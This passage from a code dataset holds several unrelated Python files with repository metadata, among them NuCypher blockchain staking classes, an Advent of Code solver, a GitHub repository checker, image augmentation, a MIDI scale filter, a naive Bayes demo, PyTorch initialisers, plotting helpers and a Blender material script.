self.blockchain.interface.w3.keccak(secret)\n escrow_proxy_deployer = UserEscrowProxyDeployer(blockchain=self.blockchain,\n deployer_address=self.deployer_address,\n secret_hash=secret)\n\n txhashes = escrow_proxy_deployer.deploy()\n return txhashes\n\n def deploy_user_escrow(self, allocation_registry: AllocationRegistry):\n user_escrow_deployer = UserEscrowDeployer(blockchain=self.blockchain,\n deployer_address=self.deployer_address,\n allocation_registry=allocation_registry)\n\n user_escrow_deployer.deploy()\n principal_address = user_escrow_deployer.contract.address\n self.user_escrow_deployers[principal_address] = user_escrow_deployer\n return user_escrow_deployer\n\n def deploy_network_contracts(self, miner_secret: bytes, policy_secret: bytes) -> Tuple[dict, dict]:\n \"\"\"\n Musketeers, if you will; Deploy the \"big three\" contracts to the blockchain.\n \"\"\"\n token_txhashes = self.deploy_token_contract()\n miner_txhashes = self.deploy_miner_contract(secret=miner_secret)\n policy_txhashes = self.deploy_policy_contract(secret=policy_secret)\n\n txhashes = {\n 
NucypherTokenDeployer.contract_name: token_txhashes,\n MinerEscrowDeployer.contract_name: miner_txhashes,\n PolicyManagerDeployer.contract_name: policy_txhashes\n }\n\n agents = {\n NucypherTokenDeployer.contract_name: self.token_agent,\n MinerEscrowDeployer.contract_name: self.miner_agent,\n PolicyManagerDeployer.contract_name: self.policy_agent\n }\n\n return txhashes, agents\n\n def deploy_beneficiary_contracts(self,\n allocations: List[Dict[str, Union[str, int]]],\n allocation_outfile: str = None,\n allocation_registry: AllocationRegistry = None,\n ) -> None:\n \"\"\"\n\n Example allocation dataset (one year is 31540000 seconds):\n\n data = [{'address': '0xdeadbeef', 'amount': 100, 'duration': 31540000},\n {'address': '0xabced120', 'amount': 133432, 'duration': 31540000*2},\n {'address': '0xf7aefec2', 'amount': 999, 'duration': 31540000*3}]\n \"\"\"\n if allocation_registry and allocation_outfile:\n raise self.ActorError(\"Pass either allocation registry or allocation_outfile, not both.\")\n if allocation_registry is None:\n allocation_registry = AllocationRegistry(registry_filepath=allocation_outfile)\n for allocation in allocations:\n deployer = self.deploy_user_escrow(allocation_registry=allocation_registry)\n deployer.deliver(value=allocation['amount'],\n duration=allocation['duration'],\n beneficiary_address=allocation['address'])\n\n @staticmethod\n def __read_allocation_data(filepath: str):\n with open(filepath, 'r') as allocation_file:\n data = allocation_file.read()\n try:\n allocation_data = json.loads(data)\n except JSONDecodeError:\n raise\n return allocation_data\n\n def deploy_beneficiaries_from_file(self, allocation_data_filepath: str, allocation_outfile: str = None):\n allocations = self.__read_allocation_data(filepath=allocation_data_filepath)\n self.deploy_beneficiary_contracts(allocations=allocations, allocation_outfile=allocation_outfile)\n\n\nclass Miner(NucypherTokenActor):\n \"\"\"\n Ursula baseclass for blockchain operations, practically carrying a pickaxe.\n \"\"\"\n\n __current_period_sample_rate = 60*60 # seconds\n\n class MinerError(NucypherTokenActor.ActorError):\n pass\n\n def __init__(self, is_me: bool, start_staking_loop: bool = True, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n self.log = Logger(\"miner\")\n self.is_me = is_me\n\n if is_me:\n self.token_agent = NucypherTokenAgent(blockchain=self.blockchain)\n\n # Staking Loop\n self.__current_period = None\n self._abort_on_staking_error = True\n self._staking_task = task.LoopingCall(self._confirm_period)\n\n else:\n self.token_agent = constants.STRANGER_MINER\n\n self.miner_agent = MinerAgent(blockchain=self.blockchain)\n\n self.__stakes = constants.NO_STAKES\n self.__start_time = constants.NO_STAKES\n self.__uptime_period = constants.NO_STAKES\n self.__terminal_period = constants.NO_STAKES\n\n self.__read_stakes()\n if self.stakes and start_staking_loop:\n self.stake()\n\n #\n # Staking\n #\n @only_me\n def stake(self, confirm_now: bool = True) -> None:\n \"\"\"High-level staking looping call initialization\"\"\"\n # TODO #841: Check if there is an active stake in the current period: Resume staking daemon\n\n # Get the last stake end period of all stakes\n terminal_period = max(stake.end_period for stake in self.stakes.values())\n\n if confirm_now:\n self.confirm_activity()\n\n # record start time and periods\n self.__start_time = maya.now()\n self.__uptime_period = self.miner_agent.get_current_period()\n self.__terminal_period = self.__uptime_period + terminal_period\n 
self.__current_period = self.__uptime_period\n self.start_staking_loop()\n\n @only_me\n def _confirm_period(self):\n\n period = self.miner_agent.get_current_period()\n self.log.info(\"Checking for new period. Current period is {}\".format(self.__current_period))\n\n if self.__current_period != period:\n\n # check for stake expiration\n stake_expired = self.__current_period >= self.__terminal_period\n if stake_expired:\n self.log.info('Stake duration expired')\n return True\n\n self.confirm_activity()\n self.__current_period = period\n self.log.info(\"Confirmed activity for period {}\".format(self.__current_period))\n\n @only_me\n def _crash_gracefully(self, failure=None):\n \"\"\"\n A facility for crashing more gracefully in the event that an exception\n is unhandled in a different thread, especially inside a loop like the learning loop.\n \"\"\"\n self._crashed = failure\n failure.raiseException()\n\n @only_me\n def handle_staking_errors(self, *args, **kwargs):\n failure = args[0]\n if self._abort_on_staking_error:\n self.log.critical(\"Unhandled error during node staking. Attempting graceful crash.\")\n reactor.callFromThread(self._crash_gracefully, failure=failure)\n else:\n self.log.warn(\"Unhandled error during node learning: {}\".format(failure.getTraceback()))\n\n @only_me\n def start_staking_loop(self, now=True):\n if self._staking_task.running:\n return False\n else:\n d = self._staking_task.start(interval=self.__current_period_sample_rate, now=now)\n d.addErrback(self.handle_staking_errors)\n self.log.info(f\"Starting Staking Loop NOW - running until period {self.__terminal_period}\")\n return d\n\n @property\n def is_staking(self):\n \"\"\"Checks if this Miner currently has locked tokens.\"\"\"\n return bool(self.locked_tokens > 0)\n\n @property\n def locked_tokens(self):\n \"\"\"Returns the amount of tokens this miner has locked.\"\"\"\n return self.miner_agent.get_locked_tokens(miner_address=self.checksum_public_address)\n\n @property\n def total_staked(self) -> NU:\n if self.stakes:\n return NU(sum(int(stake.value) for stake in self.stakes.values()), 'NuNit')\n else:\n return NU(0, 'NuNit')\n\n def __read_stakes(self) -> None:\n stakes_reader = self.miner_agent.get_all_stakes(miner_address=self.checksum_public_address)\n stakes = dict()\n for index, stake_info in enumerate(stakes_reader):\n stake = Stake.from_stake_info(owner_address=self.checksum_public_address,\n stake_info=stake_info,\n index=index)\n stakes[index] = stake\n self.__stakes = stakes\n\n @property\n def stakes(self) -> Dict[str, Stake]:\n \"\"\"Return all cached stakes from the blockchain.\"\"\"\n return self.__stakes\n\n @only_me\n def deposit(self, amount: int, lock_periods: int) -> Tuple[str, str]:\n \"\"\"Public facing method for token locking.\"\"\"\n\n approve_txhash = self.token_agent.approve_transfer(amount=amount,\n target_address=self.miner_agent.contract_address,\n sender_address=self.checksum_public_address)\n\n deposit_txhash = self.miner_agent.deposit_tokens(amount=amount,\n lock_periods=lock_periods,\n sender_address=self.checksum_public_address)\n\n return approve_txhash, deposit_txhash\n\n @only_me\n def divide_stake(self,\n stake_index: int,\n target_value: NU,\n additional_periods: int = None,\n expiration: maya.MayaDT = None) -> dict:\n \"\"\"\n Modifies the unlocking schedule and value of already locked tokens.\n\n This actor requires that is_me is True, and that the expiration datetime is after the existing\n locking schedule of this miner, or an exception will be raised.\n\n :param 
stake_index: The miner's stake index of the stake to divide\n :param additional_periods: The number of periods to extend the stake by\n :param target_value: The quantity of tokens in the smallest denomination to divide.\n :param expiration: The new expiration date to set as an end period for stake division.\n :return: Returns the blockchain transaction hash\n\n \"\"\"\n\n if additional_periods and expiration:\n raise ValueError(\"Pass the number of lock periods or an expiration MayaDT; not both.\")\n\n stake = self.__stakes[stake_index]\n\n if expiration:\n additional_periods = datetime_to_period(datetime=expiration) - stake.end_period\n if additional_periods <= 0:\n raise self.MinerError(\"Expiration {} must be at least 1 period from now.\".format(expiration))\n\n if target_value >= stake.value:\n raise self.MinerError(f\"Cannot divide stake; Value ({target_value}) must be less \"\n f\"than the existing stake value {stake.value}.\")\n\n # Ensure both halves are for valid amounts\n validate_stake_amount(amount=target_value)\n validate_stake_amount(amount=stake.value - target_value)\n\n tx = self.miner_agent.divide_stake(miner_address=self.checksum_public_address,\n stake_index=stake_index,\n target_value=int(target_value),\n periods=additional_periods)\n\n self.blockchain.wait_for_receipt(tx)\n self.__read_stakes() # update local on-chain stake cache\n return tx\n\n @only_me\n def __validate_stake(self, amount: NU, lock_periods: int) -> bool:\n\n validate_stake_amount(amount=amount)\n validate_locktime(lock_periods=lock_periods)\n\n if not self.token_balance >= amount:\n raise self.MinerError(\"Insufficient miner token balance ({balance})\".format(balance=self.token_balance))\n else:\n return True\n\n @only_me\n def initialize_stake(self,\n amount: NU,\n lock_periods: int = None,\n expiration: maya.MayaDT = None,\n entire_balance: bool = False) -> dict:\n \"\"\"\n High level staking method for Miners.\n\n :param amount: Amount of tokens to stake denominated in the smallest unit.\n :param lock_periods: Duration of stake in periods.\n :param expiration: A MayaDT object representing the time the stake expires; used to calculate lock_periods.\n :param entire_balance: If True, stake the entire balance of this node, or the maximum possible.\n\n \"\"\"\n\n if lock_periods and expiration:\n raise ValueError(\"Pass the number of lock periods or an expiration MayaDT; not both.\")\n if entire_balance and amount:\n raise self.MinerError(\"Specify an amount or entire balance, not both\")\n\n if expiration:\n lock_periods = calculate_period_duration(future_time=expiration)\n\n if entire_balance is True:\n amount = self.token_balance\n\n amount = NU(int(amount), 'NuNit')\n\n staking_transactions = OrderedDict() # type: OrderedDict # Time series of txhases\n\n # Validate\n assert self.__validate_stake(amount=amount, lock_periods=lock_periods)\n\n # Transact\n approve_txhash, initial_deposit_txhash = self.deposit(amount=int(amount), lock_periods=lock_periods)\n self._transaction_cache.append((datetime.utcnow(), initial_deposit_txhash))\n\n staking_transactions['approve'] = approve_txhash\n staking_transactions['deposit'] = initial_deposit_txhash\n self.__read_stakes() # update local on-chain stake cache\n\n self.log.info(\"{} Initialized new stake: {} tokens for {} periods\".format(self.checksum_public_address, amount, lock_periods))\n return staking_transactions\n\n #\n # Reward and Collection\n #\n\n @only_me\n def confirm_activity(self) -> str:\n \"\"\"Miner rewarded for every confirmed period\"\"\"\n 
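# Sends the confirmation transaction for the current period and caches its tx hash\n        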
txhash = self.miner_agent.confirm_activity(node_address=self.checksum_public_address)\n        self._transaction_cache.append((datetime.utcnow(), txhash))\n        return txhash\n\n    @only_me\n    def mint(self) -> str:\n        \"\"\"Computes and transfers tokens to the miner's account\"\"\"\n        mint_txhash = self.miner_agent.mint(node_address=self.checksum_public_address)\n        self._transaction_cache.append((datetime.utcnow(), mint_txhash))\n        return mint_txhash\n\n    def calculate_reward(self) -> int:\n        staking_reward = self.miner_agent.calculate_staking_reward(checksum_address=self.checksum_public_address)\n        return staking_reward\n\n    @only_me\n    def collect_policy_reward(self, collector_address=None, policy_agent: PolicyAgent = None):\n        \"\"\"Collect rewarded ETH\"\"\"\n        policy_agent = policy_agent if policy_agent is not None else PolicyAgent(blockchain=self.blockchain)\n\n        withdraw_address = collector_address or self.checksum_public_address\n        policy_reward_txhash = policy_agent.collect_policy_reward(collector_address=withdraw_address, miner_address=self.checksum_public_address)\n        self._transaction_cache.append((datetime.utcnow(), policy_reward_txhash))\n        return policy_reward_txhash\n\n    @only_me\n    def collect_staking_reward(self) -> str:\n        \"\"\"Withdraw tokens rewarded for staking.\"\"\"\n        collection_txhash = self.miner_agent.collect_staking_reward(checksum_address=self.checksum_public_address)\n        self._transaction_cache.append((datetime.utcnow(), collection_txhash))\n        return collection_txhash\n\n\nclass PolicyAuthor(NucypherTokenActor):\n    \"\"\"Alice base class for blockchain operations, mocking up new policies!\"\"\"\n\n    def __init__(self, checksum_address: str, *args, **kwargs) -> None:\n        \"\"\"\n        :param policy_agent: A policy agent with the blockchain attached; if not passed, a default policy\n        agent and blockchain connection will be created from default values.\n\n        \"\"\"\n        super().__init__(checksum_address=checksum_address, *args, **kwargs)\n\n        # From defaults\n        self.token_agent = NucypherTokenAgent(blockchain=self.blockchain)\n        self.miner_agent = MinerAgent(blockchain=self.blockchain)\n        self.policy_agent = PolicyAgent(blockchain=self.blockchain)\n\n    def recruit(self, quantity: int, **options) -> List[str]:\n        \"\"\"\n        Uses sampling logic to gather miners from the blockchain and\n        caches the resulting node ethereum addresses.\n\n        :param quantity: Number of ursulas to sample from the blockchain.\n\n        \"\"\"\n\n        miner_addresses = self.miner_agent.sample(quantity=quantity, **options)\n        return miner_addresses\n\n    def create_policy(self, *args, **kwargs):\n        \"\"\"\n        Hence the name, a PolicyAuthor can create\n        a BlockchainPolicy with themself as the author.\n\n        :return: Returns a newly authored BlockchainPolicy with n proposed arrangements.\n\n        \"\"\"\n\n        from nucypher.blockchain.eth.policies import BlockchainPolicy\n        blockchain_policy = BlockchainPolicy(alice=self, *args, **kwargs)\n        return blockchain_policy\n","repo_name":"NoskovIvan/Coinlist-NuCypher-Hackathon","sub_path":"nucypher/blockchain/eth/actors.py","file_name":"actors.py","file_ext":"py","file_size_in_byte":24730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"27541985045","text":"#!/usr/bin/env python3\nfrom sys import stdin\n\n\ndef solve1(num):\n    # Find the smallest odd-width ring whose largest value reaches num\n    width = 1\n    while True:\n        ring_max = width * width\n        if ring_max >= num:\n            break\n        width += 2\n\n    # Get the positions of the ring's corners\n    x, y = width // 2, -(width // 2)\n    bl = -x, y\n    tl = -x, -y\n    tr = x, -y\n    move = (-1, 0)\n\n    # Go backwards around the ring to reach the number\n    for _ in range(ring_max - num):\n        x += move[0]\n        y += move[1]\n\n        if (x, y) == bl:\n            move = (0, 1)\n        elif (x, y) == tl:\n            move = (1, 0)\n        elif (x, y) == tr:\n            move = (0, -1)\n\n    return abs(x) + abs(y)\n
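\n\n# Quick self-checks against the examples worked in the puzzle statement\n# (added for illustration):\nassert solve1(1) == 0\nassert solve1(12) == 3\nassert solve1(23) == 2\nassert solve1(1024) == 31\n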
\n\ndef fill_surrounding_sum(S, x, y, num):\n    surroundings = [\n        (x+1, y), (x-1, y),\n        (x+1, y+1), (x, y+1), (x-1, y+1),\n        (x+1, y-1), (x, y-1), (x-1, y-1),\n    ]\n    total = sum(S.get((a, b), 0) for a, b in surroundings)\n    if total > num:\n        print(total)\n        exit(0)\n    S[(x, y)] = total\n\n\ndef solve2(num):\n    S = {(0, 0): 1}\n    width = 1\n    x, y = 0, 0\n\n    while True:\n        width += 2\n\n        # Right\n        x += 1\n        fill_surrounding_sum(S, x, y, num)\n\n        # Up\n        for _ in range(width - 2):\n            y += 1\n            fill_surrounding_sum(S, x, y, num)\n\n        # Left\n        for _ in range(width - 1):\n            x -= 1\n            fill_surrounding_sum(S, x, y, num)\n\n        # Down\n        for _ in range(width - 1):\n            y -= 1\n            fill_surrounding_sum(S, x, y, num)\n\n        # Right\n        for _ in range(width - 1):\n            x += 1\n            fill_surrounding_sum(S, x, y, num)\n\n\nif __name__ == '__main__':\n    raw = stdin.read().strip()\n    print(solve2(int(raw)))\n","repo_name":"jonstaryuk/advent-of-code","sub_path":"2017/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"27653472097","text":"import json\nimport logging\nimport os\nimport sys\n\nlogging.basicConfig(level=os.environ.get('LOG_LEVEL', 'warning').upper())\n\ndata = sys.stdin.read()\ntry:\n    repo = json.loads(data)\n    logging.debug(\"repo: %s\", repo)\nexcept Exception:\n    logging.exception(\"error parsing response\")\n    repo = None\nif not repo:\n    logging.error(\"%s could not be read ❌\", sys.argv[1])\nelif repo.get(\"message\", \"\") == \"Moved Permanently\":\n    logging.error(\"%s has moved permanently ❌\", sys.argv[1])\nelif repo.get(\"message\", \"\") == \"Not Found\":\n    logging.error(\"%s does not exist ❌\", sys.argv[1])\nelif repo.get(\"archived\", False):\n    logging.error(\"%s has been archived ❌\", sys.argv[1])\nelif repo.get(\"has_issues\") is False:\n    logging.error(\"%s has issues disabled ❌\", sys.argv[1])\nelif \"documentation_url\" in repo:\n    message = repo.get(\"message\", \"🤷🏻‍♂️\")\n    logging.critical(\"'%s' when reading %s\", message, sys.argv[1])\nelse:\n    logging.info(\"%s is okay ✅\", sys.argv[1])\n    sys.exit(0)\n\nsys.exit(1)\n","repo_name":"oh-my-fish/packages-main","sub_path":".github/workflows/check-dead-repos.py","file_name":"check-dead-repos.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":221,"dataset":"github-code","pt":"22"} +{"seq_id":"70823359736","text":"from numpy import expand_dims\nfrom keras.preprocessing.image import load_img, save_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom flask_upload.handling import *\nimport time\n\n\n# path = '\\\\detect_3\\\\train_img/tung\\\\'\n\n\n# Define a Data Generator object whose image edits adjust brightness by factors between 0.5 and 2.0\ndef image_processes(file_img='', type='', sl=2):\n    if not file_img:\n        return None\n    img = load_img(file_img)\n    img = img_to_array(img)\n    data = expand_dims(img, 0)\n    myImageGen = None\n    if type == 'brightness':\n        myImageGen = ImageDataGenerator(brightness_range=[0.5, 2.0])\n    elif type == 'flip':\n        myImageGen = ImageDataGenerator(horizontal_flip=True, vertical_flip=True)\n    elif type == 'rotate':\n        myImageGen = ImageDataGenerator(rotation_range=45)\n    elif type == 'shear':\n        myImageGen = ImageDataGenerator(shear_range=45)\n    elif type == 'shift':\n        myImageGen = ImageDataGenerator(width_shift_range=[-150,150])\n    if not myImageGen:\n        return False\n    gen = myImageGen.flow(data, batch_size=1)\n    for i in range(sl):\n        myBatch = gen.next()\n        image = myBatch[0].astype('uint8')\n        name_folder, path, name, extension = get_name_and_path_by_path_image(file_img)\n        img = get_path_image('train_img\\\\' + name_folder, name + str(time.time()).replace('.', '') + '_' + type + '.' + extension)\n        save_img(img, image)\n    return True\n
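\n# Example usage (illustrative; the file path below is hypothetical):\n#   image_processes('train_img/person/sample.jpg', type='brightness', sl=2)\n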
\n","repo_name":"daoductung/face_recognition","sub_path":"flask_upload/handling_image.py","file_name":"handling_image.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"39879497968","text":"import isobar as iso\nfrom MidiApp import MidiApp\n\n\n## Snaps incoming notes to the C major scale\nclass ScaleFilter(MidiApp):\n\n    def midi_callback(self, message):\n        if message.type == \"note_on\" or message.type == \"note_off\":\n            note = message.note\n            semitone = (note % 12)\n            octave = int(note / 12)\n            semitone_in_scale = self.notes_lookup[semitone]\n            message.note = semitone_in_scale + 12 * octave\n            self.timeline.output_device.midi.send(message)\n\n    def start(self):\n        self.notes_lookup = [0, 0, 2, 2, 4, 5, 5, 7, 7, 9, 9, 11]\n\nif __name__ == \"__main__\":\n    app = ScaleFilter(use_midi_callback=True)\n    app.run()\n","repo_name":"rvega/midi-music","sub_path":"01_ScaleFilter.py","file_name":"01_ScaleFilter.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26200473970","text":"import numpy as np\n\n# Generate three classes of data, 100 samples per class\nnp.random.seed(42)\nclass1 = np.random.randn(100, 2) * 0.5 + np.array([1, 1])\nclass2 = np.random.randn(100, 2) * 0.5 + np.array([-1, -1])\nclass3 = np.random.randn(100, 2) * 0.5 + np.array([1, -1])\n\n# Split the dataset into training and test sets\nX_train = np.concatenate([class1[:70], class2[:70], class3[:70]])\ny_train = np.concatenate([np.zeros(70), np.ones(70), 2 * np.ones(70)])\nX_test = np.concatenate([class1[70:], class2[70:], class3[70:]])\ny_test = np.concatenate([np.zeros(30), np.ones(30), 2 * np.ones(30)])\n\n# Compute the prior probability of each class\nprior_probs = np.zeros(3)\nfor i in range(3):\n    prior_probs[i] = np.sum(y_train == i) / y_train.shape[0]\n\n# Compute the conditional distribution parameters of each feature in each class\nmean_vectors = np.zeros((3, X_train.shape[1]))\nstd_vectors = np.zeros((3, X_train.shape[1]))\nfor i in range(3):\n    mean_vectors[i] = np.mean(X_train[y_train == i], axis=0)\n    std_vectors[i] = np.std(X_train[y_train == i], axis=0)\n
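\n# Note added: the per-class score computed below is the naive Bayes posterior\n# up to a normalizing constant, with independent Gaussian features:\n#   P(y=c | x) ∝ P(y=c) * prod_j N(x_j; mu_cj, sigma_cj^2)\n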
\n# Predict labels for the test set\ny_pred = np.zeros(y_test.shape[0])\nfor i, x in enumerate(X_test):\n    # Compute the (unnormalized) probability of x under each class\n    probs = np.zeros(3)\n    for j in range(3):\n        probs[j] = np.prod(1 / (np.sqrt(2 * np.pi) * std_vectors[j]) * np.exp(-(x - mean_vectors[j]) ** 2 / (2 * std_vectors[j] ** 2))) * prior_probs[j]\n    y_pred[i] = np.argmax(probs)\n\n# Import plotting libraries\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\n\n# Set marker shapes and colors\nmarkers = ['o', '^', 's']\ncolors = ['red', 'green', 'blue']\ncmap = ListedColormap(colors)\n\n# Plot the training set\nfor i in range(3):\n    plt.scatter(X_train[y_train == i, 0], X_train[y_train == i, 1], marker=markers[i], color=colors[i], alpha=0.5, label=f\"Class {i+1}\")\n\n# Plot the test set\nfor i in range(3):\n    plt.scatter(X_test[y_test == i, 0], X_test[y_test == i, 1], marker=markers[i], color='white', edgecolors=colors[i], label=f\"Test Class {i+1}\")\n\n# Plot the decision boundary\nx1_min, x1_max = X_train[:, 0].min() - 1, X_train[:, 0].max() + 1\nx2_min, x2_max = X_train[:, 1].min() - 1, X_train[:, 1].max() + 1\nxx1, xx2 = np.meshgrid(np.linspace(x1_min, x1_max, 100), np.linspace(x2_min, x2_max, 100))\nZ = np.zeros((100, 100, 3))\nfor i in range(100):\n    for j in range(100):\n        probs = np.zeros(3)\n        for k in range(3):\n            probs[k] = np.prod(1 / (np.sqrt(2 * np.pi) * std_vectors[k]) * np.exp(-(np.array([xx1[i, j], xx2[i, j]]) - mean_vectors[k]) ** 2 / (2 * std_vectors[k] ** 2))) * prior_probs[k]\n        Z[i, j, :] = probs / np.sum(probs)\nplt.imshow(Z, extent=[x1_min, x1_max, x2_min, x2_max], origin='lower', alpha=0.5, cmap=cmap)\n\n# Add legend and axis labels\nplt.legend()\nplt.xlabel('Feature 1')\nplt.ylabel('Feature 2')\n\n# Compute the accuracy and show it above the plot\naccuracy = np.sum(y_pred == y_test) / y_test.shape[0]\nplt.title(f\"Accuracy: {accuracy:.2f}\", fontsize=14, y=1.1)\n\n# Show the figure\nplt.show()","repo_name":"seagochen/MachineLearningDemo","sub_path":"03.NaiveBayesianNetwork.py","file_name":"03.NaiveBayesianNetwork.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"810887459","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\n\ndef normalized_columns_initializer(weights, std=1.0):\n    out = torch.randn(weights.size())\n    out *= std / torch.sqrt(out.pow(2).sum(1, keepdim=True))\n    return out\n\n\ndef weights_init(m):\n    classname = m.__class__.__name__\n    if classname.find('Conv') != -1 and hasattr(m, 'weight'):\n        weight_shape = list(m.weight.data.size())\n        fan_in = np.prod(weight_shape[1:4])\n        fan_out = np.prod(weight_shape[2:4]) * weight_shape[0]\n        w_bound = np.sqrt(6. / (fan_in + fan_out))\n        m.weight.data.uniform_(-w_bound, w_bound)\n        m.bias.data.fill_(0)\n    elif classname.find('Linear') != -1:\n        weight_shape = list(m.weight.data.size())\n        fan_in = weight_shape[1]\n        fan_out = weight_shape[0]\n        w_bound = np.sqrt(6. / (fan_in + fan_out))\n        m.weight.data.uniform_(-w_bound, w_bound)\n        m.bias.data.fill_(0)\n    elif classname.find('LSTM') != -1:\n        # weight_shape = list(m.weight.data.size())\n        # fan_in = weight_shape[1]\n        # fan_out = weight_shape[0]\n        # w_bound = np.sqrt(6. / (fan_in + fan_out))\n        # m.weight.data.uniform_(-w_bound, w_bound)\n        m.bias_ih.data.fill_(0)\n        m.bias_hh.data.fill_(0)\n
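\n\n# Typical usage (illustrative): apply recursively to every submodule, e.g.\n#   net = nn.Sequential(nn.Linear(4, 8), nn.Linear(8, 2))\n#   net.apply(weights_init)\n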
\n\ndef layer_init(layer, w_scale=1.0):\n    nn.init.orthogonal_(layer.weight.data)\n    layer.weight.data.mul_(w_scale)\n    nn.init.constant_(layer.bias.data, 0)\n    return layer\n\n\ndef init_hidden_cell(in_size, device):\n    hx = torch.zeros(1, in_size).to(device)\n    cx = torch.zeros(1, in_size).to(device)\n    return hx, cx\n\n","repo_name":"psavine42/juststuff","sub_path":"src/algo/init_custom.py","file_name":"init_custom.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7373067223","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport numpy as np\nimport seaborn as sns\n\n\ndef do_eda_plot_for_iris(iris_data):\n    \"\"\"\n    EDA: exploratory data analysis\n    \"\"\"\n    category_color_dict = {\n        'Iris-setosa': 'red',\n        'Iris-versicolor': 'blue',\n        'Iris-virginica': 'green'\n    }\n\n    fig, axes = plt.subplots(2, 1, figsize=(8, 8))\n\n    for category_name, category_color in category_color_dict.items():\n\n        #\n        iris_data[iris_data['Species'] == category_name].plot(ax=axes[0], kind='scatter',\n                                                              x='SepalLengthCm', y='SepalWidthCm', label=category_name,\n                                                              color=category_color)\n        #\n        iris_data[iris_data['Species'] == category_name].plot(ax=axes[1], kind='scatter',\n                                                              x='PetalLengthCm', y='PetalWidthCm', label=category_name,\n                                                              color=category_color)\n\n    axes[0].set_xlabel('Sepal Length')\n    axes[0].set_ylabel('Sepal Width')\n    axes[0].set_title('Sepal Length vs Sepal Width')\n\n    axes[1].set_xlabel('Petal Length')\n    axes[1].set_ylabel('Petal Width')\n    axes[1].set_title('Petal Length vs Petal Width')\n\n    plt.tight_layout()\n    plt.savefig('./iris_eda.png')\n    plt.show()\n\n\ndef do_pair_plot_for_iris(iris_data):\n    \"\"\"\n    Visualize the pairwise relationships between the sample features of the iris dataset.\n    Args:\n    - iris_data: the iris dataset\n    \"\"\"\n    g = sns.pairplot(data=iris_data[['SepalLengthCm', 'SepalWidthCm', 'PetalLengthCm', 'PetalWidthCm', 'Species']],\n                     hue='Species')\n    plt.tight_layout()\n    plt.show()\n    g.savefig('./iris_pairplot.png')\n\n\ndef plot_knn_boundary(knn_model, X, y, fig_title, save_fig):\n    \"\"\"\n    Plot the classification decision boundary\n    \"\"\"\n    h = .02  # step size in the mesh\n\n    # Create color maps\n    cmap_light = ListedColormap(['#FFAAAA', '#AAFFAA', '#AAAAFF'])\n    cmap_bold = ListedColormap(['#FF0000', '#00FF00', '#0000FF'])\n\n    # point in the mesh [x_min, x_max]x[y_min, y_max].\n    x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n    y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n    xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n                         np.arange(y_min, y_max, h))\n    Z = knn_model.predict(np.c_[xx.ravel(), yy.ravel()])\n\n    # Put the result into a color plot\n    Z = Z.reshape(xx.shape)\n    plt.figure()\n    plt.pcolormesh(xx, yy, Z, cmap=cmap_light)\n\n    # Plot also the training points\n    plt.scatter(X[:, 0], X[:, 1], c=y, cmap=cmap_bold,\n                edgecolor='k', s=20)\n    plt.xlim(xx.min(), xx.max())\n    plt.ylim(yy.min(), yy.max())\n    plt.title(fig_title)\n\n    plt.savefig(save_fig)\n\n    plt.show()\n
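\n\n# Example call (illustrative; assumes a fitted sklearn-style classifier):\n#   plot_knn_boundary(knn_model, X_train, y_train, 'KNN decision boundary', './knn_boundary.png')\n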
plt.savefig('./house_feat.png')\n    plt.show()\n\n\ndef plot_fitting_line(linear_reg_model, X, y, fig_title, save_fig):\n    \"\"\"\n    Plot the fitted linear regression line\n    Parameters:\n        linear_reg_model: the trained linear regression model\n        X: dataset features\n        y: dataset labels\n        fig_title: figure title\n        save_fig: path where the figure is saved\n    \"\"\"\n    # coefficients of the linear regression model\n    coef = linear_reg_model.coef_\n\n    # intercept of the linear regression model\n    intercept = linear_reg_model.intercept_\n\n    # plot the sample points\n    plt.scatter(X, y, alpha=0.5)\n\n    # plot the fitted line\n    plt.plot(X, X * coef + intercept, c='red')\n\n    plt.title(fig_title)\n    plt.savefig(save_fig)\n    plt.show()","repo_name":"crystal98tang/AI_demo","sub_path":"ai_utils.py","file_name":"ai_utils.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
+{"seq_id":"4843000996","text":"import bpy\n\n\n\nmaterial_toon = bpy.data.materials.get(\"Toon02\")\nmaterial_outline = bpy.data.materials.get('Outline')\n\n# Add several shaders to an object (here the toon shader)\n\nobjects_scene = []\n\nfor obj in bpy.data.objects :\n    if obj.type == \"MESH\":\n        obj.select_set(True)\n#        bpy.ops.object.material_slot_remove()\n        objects_scene.append(obj)\n\n\nfor o in objects_scene:\n    bpy.ops.object.material_slot_add()\n    o.data.materials.append(material_toon)\n    bpy.ops.object.material_slot_add()\n    o.data.materials.append(material_outline)","repo_name":"OphelieAbb/Blender_python_stage_2021","sub_path":"BLENDER_python/ShaderToon.py","file_name":"ShaderToon.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"}
